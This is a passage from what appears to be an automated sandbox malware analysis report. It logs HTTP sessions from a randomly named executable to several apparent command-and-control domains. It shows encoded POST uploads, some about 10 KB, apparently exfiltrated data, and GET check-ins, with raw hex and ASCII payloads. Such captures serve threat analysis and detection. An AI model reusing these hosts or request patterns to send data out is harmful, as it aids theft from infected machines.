                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 74 6a 74 38 35 44 43 75 73 39 4d 70 48 61 6e 73 66 7a 4a 6c 67 70 36 75 6b 51 64 34 48 6f 67 62 58 4d 4c 4d 74 56 4e 38 50 63 38 43 6f 42 59 64 6d 41 38 65 2b 74 61 65 45 4e 53 30 58 36 7a 51 39 6d 62 4a 4e 45 54 59 66 33 59 32 2b 32 35 46 58 36 4c 32 41 73 35 4c 41 4b 4d 32 4d 78 35 59 43 49 36 67 35 6a 6f 4e 71 77 33 50 4a 75 31 7a 34 66 6c 4c 33 55 55 73 68 33 37 71 63 4e 4b 68 46 64 38 70 6e 67 2f 4b 58 79 66 67 61 63 2b 50 32 57 68 58 4e 62 2f 34 64 35 69 57 6e 74 6f 69 30 50 5a 4c 6a 65 31 32 49 46 6e 38 7a 39 37 4f 73 61 71 52 2b 4e 35 2b 52 61 48 6e 75 47 2b 49 39 77 3d 3d
                                                          Data Ascii: TvpPfhGp=tjt85DCus9MpHansfzJlgp6ukQd4HogbXMLMtVN8Pc8CoBYdmA8e+taeENS0X6zQ9mbJNETYf3Y2+25FX6L2As5LAKM2Mx5YCI6g5joNqw3PJu1z4flL3UUsh37qcNKhFd8png/KXyfgac+P2WhXNb/4d5iWntoi0PZLje12IFn8z97OsaqR+N5+RaHnuG+I9w==


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          14 | 192.168.2.4 | 49751 | 203.161.41.205 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:57:44.253186941 CEST | 752 | OUT | POST /4n8t/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.shabygreen.top
                                                          Origin: http://www.shabygreen.top
                                                          Referer: http://www.shabygreen.top/4n8t/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 74 6a 74 38 35 44 43 75 73 39 4d 70 47 36 58 73 5a 55 31 6c 69 4a 36 74 72 77 64 34 4f 49 67 66 58 4d 48 4d 74 52 63 6e 4d 75 59 43 70 67 6f 64 6e 43 45 65 39 74 61 65 63 39 53 74 49 71 7a 62 39 6d 47 2b 4e 42 72 59 66 33 38 32 2b 7a 56 46 57 4e 33 31 42 38 35 4a 49 71 4d 6f 43 52 35 59 43 49 36 67 35 69 4d 6e 71 77 76 50 49 65 6c 7a 33 61 46 49 72 45 55 74 32 48 37 71 52 74 4b 74 46 64 38 48 6e 68 7a 77 58 77 6e 67 61 64 4f 50 32 6a 56 57 55 72 2f 2b 5a 35 69 48 68 4d 78 51 74 63 68 43 6c 49 70 31 41 45 62 67 79 37 71 55 39 72 4c 47 73 4e 64 4e 4d 64 4f 54 6a 46 44 42 6d 33 7a 62 6d 62 49 66 55 34 61 50 52 36 74 36 37 45 77 44 50 4a 41 3d
                                                          Data Ascii: TvpPfhGp=tjt85DCus9MpG6XsZU1liJ6trwd4OIgfXMHMtRcnMuYCpgodnCEe9taec9StIqzb9mG+NBrYf382+zVFWN31B85JIqMoCR5YCI6g5iMnqwvPIelz3aFIrEUt2H7qRtKtFd8HnhzwXwngadOP2jVWUr/+Z5iHhMxQtchClIp1AEbgy7qU9rLGsNdNMdOTjFDBm3zbmbIfU4aPR6t67EwDPJA=
                                                          Jul 3, 2024 15:57:44.948184013 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:57:44 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          15 | 192.168.2.4 | 49752 | 203.161.41.205 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:57:46.889579058 CEST | 10834 | OUT | POST /4n8t/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.shabygreen.top
                                                          Origin: http://www.shabygreen.top
                                                          Referer: http://www.shabygreen.top/4n8t/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 74 6a 74 38 35 44 43 75 73 39 4d 70 47 36 58 73 5a 55 31 6c 69 4a 36 74 72 77 64 34 4f 49 67 66 58 4d 48 4d 74 52 63 6e 4d 75 51 43 70 57 55 64 6d 6c 6f 65 38 74 61 65 56 64 53 6f 49 71 7a 47 39 6d 4f 36 4e 42 75 74 66 78 34 32 2f 52 64 46 52 35 6a 31 4f 38 35 4a 45 4b 4d 31 4d 78 35 4e 43 49 71 6b 35 6a 38 6e 71 77 76 50 49 59 68 7a 77 50 6c 49 70 45 55 73 68 33 37 2b 63 4e 4b 4a 46 64 6b 78 6e 68 6e 67 58 45 62 67 61 2b 32 50 6c 6c 35 57 63 72 2f 47 63 35 6a 61 68 4d 4e 4c 74 63 38 37 6c 49 30 51 41 45 2f 67 78 74 76 78 74 62 66 51 7a 2f 78 49 53 39 6d 4a 6b 6c 36 47 68 58 58 6e 73 75 45 56 4d 4a 65 58 4a 71 6b 6b 67 45 70 44 53 35 39 7a 48 34 51 6c 79 4e 46 7a 52 53 44 38 4c 6e 7a 59 75 50 56 66 59 6c 58 52 59 6b 39 56 4e 62 41 76 47 54 44 48 34 4f 2f 4e 72 43 49 4c 54 6d 6e 4d 75 41 35 42 42 72 33 38 70 33 31 51 48 56 71 35 38 78 72 74 70 2f 62 4d 38 4a 4e 7a 42 36 6a 57 56 68 70 76 75 64 30 2f 6f 2b 63 42 67 4f 64 64 61 35 41 38 6e 47 31 2f 4f 39 75 63 6b 50 39 6b 38 [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=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 [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          16 | 192.168.2.4 | 49753 | 203.161.41.205 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:57:49.428736925 CEST | 463 | OUT | GET /4n8t/?TvpPfhGp=ghFc6znRteN4Ja3nQE93pb+klyhhNrAgC93ynk4+Lc8v1BQxlwgw+LzLUcq3fIz0ommJFFyvB0Z1ghBSVa+hRbhXI8cuWBtdWYqwziEG2BzJAupp88dDv3U=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.shabygreen.top
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:57:51.156693935 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:57:49 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          17 | 192.168.2.4 | 49754 | 104.21.84.69 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:57:56.202965021 CEST | 720 | OUT | POST /4ogj/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.077551.xyz
                                                          Origin: http://www.077551.xyz
                                                          Referer: http://www.077551.xyz/4ogj/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 56 52 35 7a 32 6a 43 59 66 53 57 55 55 35 59 7a 38 6e 43 57 6f 6e 4b 6a 4d 6e 71 7a 70 77 79 6e 48 33 70 4c 64 6a 53 73 35 67 70 55 79 32 39 6e 4f 70 33 61 61 55 4a 79 41 72 67 33 39 61 67 49 79 6f 6c 5a 61 52 55 46 51 39 5a 35 45 6e 66 67 64 42 68 4c 57 2f 68 71 31 4c 38 65 61 6c 53 39 42 58 54 52 46 4a 61 67 35 55 6d 46 7a 54 56 54 67 72 4d 79 42 34 59 4a 6c 46 70 65 6a 67 6d 36 6b 59 35 64 55 74 64 75 4e 58 4b 2f 56 35 33 63 2f 77 37 71 34 51 5a 36 71 6c 78 6e 43 51 4a 32 45 53 2b 46 30 30 45 66 4f 61 69 6b 2b 4b 38 58 74 34 35 63 4b 64 58 53 4d 55 6e 69 52 6d 4d 31 54 77 3d 3d
                                                          Data Ascii: TvpPfhGp=VR5z2jCYfSWUU5Yz8nCWonKjMnqzpwynH3pLdjSs5gpUy29nOp3aaUJyArg39agIyolZaRUFQ9Z5EnfgdBhLW/hq1L8ealS9BXTRFJag5UmFzTVTgrMyB4YJlFpejgm6kY5dUtduNXK/V53c/w7q4QZ6qlxnCQJ2ES+F00EfOaik+K8Xt45cKdXSMUniRmM1Tw==
                                                          Jul 3, 2024 15:57:57.156107903 CEST | 716 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:57:57 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFeR61Favkmtd%2FCCIaNnbqBf7cIn1p%2BY8DNB7GZ75LVVdA693jbZmguceiFUtcpwr5xUbiMHC%2FWsLEnDn0ewajuHYLpfB1%2BW4QTFwnSCQ%2BWWcd7c3xPFF6aoG7IwUomEaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 89d76334c9020f6f-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          18 | 192.168.2.4 | 49755 | 104.21.84.69 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:57:58.741971970 CEST | 740 | OUT | POST /4ogj/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.077551.xyz
                                                          Origin: http://www.077551.xyz
                                                          Referer: http://www.077551.xyz/4ogj/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 56 52 35 7a 32 6a 43 59 66 53 57 55 47 6f 49 7a 2f 45 71 57 76 48 4b 67 44 48 71 7a 6a 51 79 6a 48 33 31 4c 64 68 2b 38 2b 53 4e 55 79 57 4e 6e 50 6f 33 61 58 30 4a 79 53 4c 68 7a 67 4b 67 48 79 6f 5a 2f 61 51 6f 46 51 39 4e 35 45 6d 76 67 64 77 68 4b 58 76 68 6f 35 72 38 63 65 6c 53 39 42 58 54 52 46 4b 6e 4e 35 58 57 46 7a 69 6c 54 76 75 34 7a 43 34 59 4b 69 46 70 65 75 41 6d 32 6b 59 34 2b 55 76 70 45 4e 55 79 2f 56 37 66 63 38 68 36 38 33 51 5a 38 6e 46 77 72 45 79 34 39 47 43 58 45 31 43 4d 7a 48 37 62 48 2f 4d 74 4e 38 4a 59 4c 59 64 7a 68 52 54 75 57 63 6c 78 38 49 2f 58 6e 57 2b 42 4e 68 71 35 63 61 79 39 6f 62 57 47 65 61 47 4d 3d
                                                          Data Ascii: TvpPfhGp=VR5z2jCYfSWUGoIz/EqWvHKgDHqzjQyjH31Ldh+8+SNUyWNnPo3aX0JySLhzgKgHyoZ/aQoFQ9N5EmvgdwhKXvho5r8celS9BXTRFKnN5XWFzilTvu4zC4YKiFpeuAm2kY4+UvpENUy/V7fc8h683QZ8nFwrEy49GCXE1CMzH7bH/MtN8JYLYdzhRTuWclx8I/XnW+BNhq5cay9obWGeaGM=
                                                          Jul 3, 2024 15:57:59.675770044 CEST | 714 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:57:59 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UXJODCru3E7%2BYKtEYeDhBg5GaCiHTtMc2F0Zpy5wvsTB7kIbk6%2B8BDT2DldnKbB2ryZN9CJDFRFeVfNZbc0Q1qJs6Bbj%2B3aPV8huajNQrjRlZIsLS7Rc7OuQ02lzH%2F7otA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 89d76344bba619ff-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          19 | 192.168.2.4 | 49756 | 104.21.84.69 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:01.272028923 CEST | 10822 | OUT | POST /4ogj/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.077551.xyz
                                                          Origin: http://www.077551.xyz
                                                          Referer: http://www.077551.xyz/4ogj/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:58:02.164757967 CEST | 714 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:58:02 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gwfe6%2FKODcAS76QtiBNnsKpDFM9jeiGjByxQ7wEYaPj%2B5pMTMG0V5xHQc%2BbQJptsrFe1emHta6Ax%2FAftnYuzRmHTjHxugnEMdnjFxpo6pdQi6yJ9VZv9ryZhSY0YKg6rww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 89d7635479df1a03-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          20 | 192.168.2.4 | 49757 | 104.21.84.69 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:03.808232069 CEST | 459 | OUT | GET /4ogj/?TvpPfhGp=YTRT1VqeLBjCR4EP9RCwoUuRD3fAmDmZSXxlYBWmziMpmVFqJYD2flBFEL5Xrb4qxpJfVCdAXewDQ3blUDpCJrAw7sENNjOuYnGrLaGL8E6T/3d2k8tiM5Q=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.077551.xyz
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:58:04.726861954 CEST | 723 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:58:04 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JsusM2VwyCyw4jpMO2iPY5eVEtvEnQkIaAzG8CzXHISpTixv8trpx71O9ZKPSqN5qQCH1oy3nu4OYKIX9VG8EHG2dsjypZ3cRlR8i4x6QWRU%2BcO%2BArhEwQ9X8jENGd9jBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 89d763644b3dc358-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          21 | 192.168.2.4 | 49758 | 74.208.236.38 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:09.960850954 CEST | 726 | OUT | POST /8g7d/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.costmoon.com
                                                          Origin: http://www.costmoon.com
                                                          Referer: http://www.costmoon.com/8g7d/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=mUz7sZ2RmY+Zo4n+ynycge9iI7LupfbaLonH9y/izUwOmAZ6e0HAOdIGOqpZguZvb/d2lPnJDbUR9uZV+3toQkZ30txXn9W3qSB9SECfgsBVwM3eUDpqaEZAIyxjWEOPzURHd0AFF1exWXpd1MJKVM/dBZKyptE/hPHo8cIUswnHSlxk7Z+LAmnN59Zq10r6fg==
                                                          Jul 3, 2024 15:58:10.505834103 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:58:10 GMT
                                                          Server: Apache
                                                          Content-Encoding: gzip


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          22 | 192.168.2.4 | 49759 | 74.208.236.38 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:12.500266075 CEST | 746 | OUT | POST /8g7d/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.costmoon.com
                                                          Origin: http://www.costmoon.com
                                                          Referer: http://www.costmoon.com/8g7d/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=mUz7sZ2RmY+ZpbP+iwmcoe9hHbLui/bgLojH9zLMzgcOhiB6Z2/ANdIGFKoTuOZeb/QLlObJDf8R9sBV9GtnR0Zx9NxVj9W3qSB9SEGhgsJVx8HeGyprbEZDPyxjHUOLzURfdxkrF3WxWVhd2YVJcM/beJLF4o97k6iUzvVxxiXZTjg+qofcSmD+k6Qe43WzEqciWPiRGVVKs5Eppct2IG4=
                                                          Jul 3, 2024 15:58:13.017472029 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:58:12 GMT
                                                          Server: Apache
                                                          Content-Encoding: gzip


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          23 | 192.168.2.4 | 49760 | 74.208.236.38 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:15.035931110 CEST | 10828 | OUT | POST /8g7d/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.costmoon.com
                                                          Origin: http://www.costmoon.com
                                                          Referer: http://www.costmoon.com/8g7d/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:58:15.603627920 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:58:15 GMT
                                                          Server: Apache
                                                          Content-Encoding: gzip


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          24 | 192.168.2.4 | 49761 | 74.208.236.38 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
